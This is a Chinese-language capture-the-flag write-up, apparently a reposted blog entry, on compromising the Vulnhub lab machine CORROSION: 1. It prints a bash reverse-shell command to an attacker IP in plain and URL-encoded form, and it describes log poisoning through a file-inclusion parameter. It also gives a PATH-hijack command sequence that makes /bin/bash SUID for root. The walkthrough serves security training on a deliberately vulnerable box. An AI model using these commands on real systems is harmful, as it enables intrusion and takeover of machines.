其他分享
首页 > 其他分享> > Vulnhub 靶场 CORROSION: 1

Vulnhub 靶场 CORROSION: 1

作者:互联网

前期准备:

靶机地址:https://www.vulnhub.com/entry/corrosion-1,730/

kali攻击机ip:192.168.11.129
靶机ip:192.168.11.199

一、信息收集

1.使用nmap对目标靶机进行扫描

image

发现开放了22和80端口。

2. 80端口

image

源代码中也没有什么提示,扫一下目录:

image

挨个访问一下:

/tasks

image

说了需要完成的任务。

/blog-post

image

randy 大概是个用户名。很具前面目录扫描的结果判断,/blog-post 目录后还有东西,再扫一下:

image

又发现了一些页面,查看一下:

/blog-post/archives/

image

二、漏洞利用

查看一下 randylogs.php 文件:

image

返回的 /blog-post/archives/randylogs.php 发现什么也没有,感觉不对,用 wfuzz 做一下模糊测试:

image

得到了 file 参数。

image

可以访问系统文件,看先之前提到的 auth.log 日志:

image

发现会记录 ssh 登录的所有活动,那我们可以尝试添加恶意 PHP 代码作为用户名,该代码将从用户输入并执行命令。这通常称为日志中毒。

image

再次查看日志信息:

image

注入的信息应该在这里,验证一下:

image

发现没问题,写入shell:

bash -c 'bash -i >& /dev/tcp/192.168.11.129/1234 0>&1'

url 编码一下:

bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.11.129%2F1234%200%3E%261%27

访问并监听:

image

image

之前我们访问 /etc/passwd 文件时,发现有个用户 randy,大概下一步是要提权到 rangdy。

三、提权

查看了一下系统内的文件:

image

最后在 /var/backups/ 目录下发现一个 user_backup.zip:

image

解压时发现有密码,传输到本地 kali 上破解一下:

这里用的 nc 传输:

image

爆破一下压缩包:

image

pw == !randybaby

查看压缩包内的信息:

image

image

发现 randy 的密码,ssh 登录:

image

查看一下权限:

image

发现了 /home/randy/tools/easysysinfo ,查看一下:

image

image

查看权限发现并不能改,那就用之前的方法,本地编辑 cat 文件,写入 shell:

echo 'chmod +s /bin/bash' > cat
chmod 777 cat
export PATH=/home/randy/tools:$PATH
./easysysinfo
/bin/bash -p

image

成功获取到 root,在 /root 下发现了flag:

image

并且还在 /root/creds 下发现了 root 密码:

image

标签:发现,CORROSION,查看,一下,blog,randy,Vulnhub,靶场,post
来源: https://www.cnblogs.com/sainet/p/15706037.html